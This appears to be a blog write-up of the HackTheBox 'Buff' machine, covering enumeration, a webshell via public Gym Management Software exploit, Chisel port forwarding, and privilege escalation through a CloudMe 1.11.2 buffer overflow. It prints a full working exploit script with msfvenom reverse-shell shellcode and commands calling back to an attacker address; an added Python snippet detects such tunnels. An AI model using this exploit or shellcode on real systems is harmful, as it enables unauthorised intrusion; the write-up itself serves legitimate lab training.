
HackTheBox - Buff

Buff is a very nice OSCP-style box, where I have to identify the web software running on the site and exploit it using public exploits to get execution via a webshell. For privesc, I’ll find another service I can exploit using public exploits. I’m going to build my own shellcode to create my own shell, and set up the service so that I can connect just by listening on localhost. From there, the exploit script returns an administrator’s shell. In Beyond Root, I’ll go through the first script and do the exploit manually, and see how Defender blocks some of my attempts.

Enumeration

nmap scan

$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Buff-full-port-scan.txt 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.18s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Port 8080 (HTTP)


Visiting port 8080 shows us a web page about fitness.


The /contact.php page discloses that Gym Management Software is being used.


Using searchsploit we identified a potential exploit.

Foothold

The exploit mimics a shell and allows us to send remote commands.


We can upgrade our shell to a more stable shell by uploading nc.exe and executing it:

$ locate nc.exe
/opt/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-resources/binaries/nc.exe
$ cp /usr/share/windows-resources/binaries/nc.exe .


Privesc

Using winPEAS, we can see that there is an app called CloudMe which is listening on local port 8888 but is not exposed remotely.


Plus, if we look at C:\Users\shaun\Downloads\, we can find a binary file called CloudMe_1112.exe:

PS C:\Users\shaun\Downloads> dir
dir


    Directory: C:\Users\shaun\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe  

In order to transfer it to our local machine, we can take advantage of the current web server:

C:\Users\shaun\Downloads>copy CloudMe_1112.exe C:\xampp\htdocs\gym\                                                                                 
copy CloudMe_1112.exe C:\xampp\htdocs\gym\
        1 file(s) copied.

Note: following the Stack-Based Buffer Overflows on Windows x86 course on Academy will guide you through writing an exploit for this program.

Port forwarding with chisel

CloudMe is listening only on localhost.

If we want to make this port available to our machine, we can use a tunneling tool such as Chisel, here in reverse port-forwarding mode. Go to the release page and download the latest executables for Windows and Linux amd64.

  • First, on our Kali machine, we have to set up the Chisel server, listening on any port (here 9999):

    
      $ /chisel_1.7.6_linux_amd64 server -p 9999 --reverse
      2021/09/07 00:09:35 server: Reverse tunnelling enabled
      2021/09/07 00:09:35 server: Fingerprint EFwUZIpNMK9gCrrI3aubBlSlDShKhEzk0ophq0C08S4=
      2021/09/07 00:09:35 server: Listening on http://0.0.0.0:9999
    
  • Then, on the target machine, tunnel port 8888 to our machine:

      C:\>.\chisel.exe client 10.10.14.12:9999 R:8888:127.0.0.1:8888
      .\chisel.exe client 10.10.14.12:9999 R:8888:127.0.0.1:8888
      2021/09/06 23:17:24 client: Connecting to ws://10.10.14.12:9999
      2021/09/06 23:17:26 client: Connected (Latency 188.0315ms)
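
A defender's view of the tunnel above, as an added example that is not part of the original post: it scans process command lines for chisel-style reverse remotes (`R:...`) and flags the ones that publish a loopback-only service to a remote server. The event records, host names and the `find_reverse_forwards` helper are constructed for illustration; only the three- and four-part `R:` forms are parsed (no IPv6, no quoted arguments).

```python
import re
from ipaddress import ip_address

# Constructed process-creation records (host, command line); not taken from the page.
SAMPLE_EVENTS = [
    ("WS01", r".\chisel.exe client 10.10.14.12:9999 R:8888:127.0.0.1:8888"),
    ("WS02", r"C:\tools\c.exe client https://tunnel.example:443 R:0.0.0.0:3306:localhost:3306"),
    ("WS03", r"chisel.exe client 192.0.2.10:8080 5000:intranet.example:80"),
    ("WS04", r"C:\Windows\System32\ping.exe 10.10.14.12"),
]

# R:[bind:]listen_port:target_host:target_port[/tcp|/udp]
REVERSE_REMOTE = re.compile(
    r"^R:(?:(?P<bind>[^:]+):)?(?P<lport>\d+):(?P<host>[^:]+):(?P<rport>\d+)(?:/(?:tcp|udp))?$"
)

def is_loopback(host):
    """True when the forwarded target is only reachable on the local machine."""
    if host.lower() == "localhost":
        return True
    try:
        return ip_address(host).is_loopback
    except ValueError:  # a DNS name other than localhost
        return False

def find_reverse_forwards(events):
    """Return one finding per reverse remote seen after a 'client' subcommand.

    Matching is on argument shape, not the binary name, so a renamed
    executable (c.exe in the sample) is still caught.
    """
    findings = []
    for host, cmdline in events:
        tokens = cmdline.split()
        if "client" not in tokens:
            continue
        args = tokens[tokens.index("client") + 1:]
        # Approximation: the tunnel server is the first argument that is
        # neither a flag nor a remote spec.
        server = next((a for a in args
                       if not a.startswith("-") and not REVERSE_REMOTE.match(a)), None)
        for arg in args:
            m = REVERSE_REMOTE.match(arg)
            if m:
                findings.append({
                    "host": host,
                    "server": server,
                    "listen_port": int(m["lport"]),
                    "target": f'{m["host"]}:{m["rport"]}',
                    "exposes_loopback": is_loopback(m["host"]),
                })
    return findings
```

Findings with `exposes_loopback` set are the ones worth triaging first: a service that was deliberately bound to 127.0.0.1 is being made reachable from outside the host.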
    

Exploitation

Looking for CloudMe with searchsploit, we can find multiple exploits:


The first one works just fine, but we have to replace the shellcode. msfvenom can help us do that:

$ msfvenom -p windows/shell_reverse_tcp LHOST=$(vpnip) LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python --var-name payload

Then we can edit the exploit source file as follows:

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket
import sys

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

# msfvenom -p windows/shell_reverse_tcp LHOST=$(vpnip) LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python --var-name payload
payload =  b""
payload += b"\xb8\x45\x01\x16\x38\xd9\xed\xd9\x74\x24\xf4\x5f"
payload += b"\x33\xc9\xb1\x52\x83\xef\xfc\x31\x47\x0e\x03\x02"
payload += b"\x0f\xf4\xcd\x70\xe7\x7a\x2d\x88\xf8\x1a\xa7\x6d"
payload += b"\xc9\x1a\xd3\xe6\x7a\xab\x97\xaa\x76\x40\xf5\x5e"
payload += b"\x0c\x24\xd2\x51\xa5\x83\x04\x5c\x36\xbf\x75\xff"
payload += b"\xb4\xc2\xa9\xdf\x85\x0c\xbc\x1e\xc1\x71\x4d\x72"
payload += b"\x9a\xfe\xe0\x62\xaf\x4b\x39\x09\xe3\x5a\x39\xee"
payload += b"\xb4\x5d\x68\xa1\xcf\x07\xaa\x40\x03\x3c\xe3\x5a"
payload += b"\x40\x79\xbd\xd1\xb2\xf5\x3c\x33\x8b\xf6\x93\x7a"
payload += b"\x23\x05\xed\xbb\x84\xf6\x98\xb5\xf6\x8b\x9a\x02"
payload += b"\x84\x57\x2e\x90\x2e\x13\x88\x7c\xce\xf0\x4f\xf7"
payload += b"\xdc\xbd\x04\x5f\xc1\x40\xc8\xd4\xfd\xc9\xef\x3a"
payload += b"\x74\x89\xcb\x9e\xdc\x49\x75\x87\xb8\x3c\x8a\xd7"
payload += b"\x62\xe0\x2e\x9c\x8f\xf5\x42\xff\xc7\x3a\x6f\xff"
payload += b"\x17\x55\xf8\x8c\x25\xfa\x52\x1a\x06\x73\x7d\xdd"
payload += b"\x69\xae\x39\x71\x94\x51\x3a\x58\x53\x05\x6a\xf2"
payload += b"\x72\x26\xe1\x02\x7a\xf3\xa6\x52\xd4\xac\x06\x02"
payload += b"\x94\x1c\xef\x48\x1b\x42\x0f\x73\xf1\xeb\xba\x8e"
payload += b"\x92\x19\x31\x9e\x6e\x76\x47\x9e\x7f\xda\xce\x78"
payload += b"\x15\xf2\x86\xd3\x82\x6b\x83\xaf\x33\x73\x19\xca"
payload += b"\x74\xff\xae\x2b\x3a\x08\xda\x3f\xab\xf8\x91\x1d"
payload += b"\x7a\x06\x0c\x09\xe0\x95\xcb\xc9\x6f\x86\x43\x9e"
payload += b"\x38\x78\x9a\x4a\xd5\x23\x34\x68\x24\xb5\x7f\x28"
payload += b"\xf3\x06\x81\xb1\x76\x32\xa5\xa1\x4e\xbb\xe1\x95"
payload += b"\x1e\xea\xbf\x43\xd9\x44\x0e\x3d\xb3\x3b\xd8\xa9"
payload += b"\x42\x70\xdb\xaf\x4a\x5d\xad\x4f\xfa\x08\xe8\x70"
payload += b"\x33\xdd\xfc\x09\x29\x7d\x02\xc0\xe9\x9d\xe1\xc0"
payload += b"\x07\x36\xbc\x81\xa5\x5b\x3f\x7c\xe9\x65\xbc\x74"
payload += b"\x92\x91\xdc\xfd\x97\xde\x5a\xee\xe5\x4f\x0f\x10"
payload += b"\x59\x6f\x1a"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	

buf = padding1 + EIP + NOPS + payload + overrun 

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(buf)
except Exception as e:
	print(e)

We forwarded port 8888 of the target to our port 8888; now we just have to run the exploit:



This post is licensed under 0x3n0 by the author.
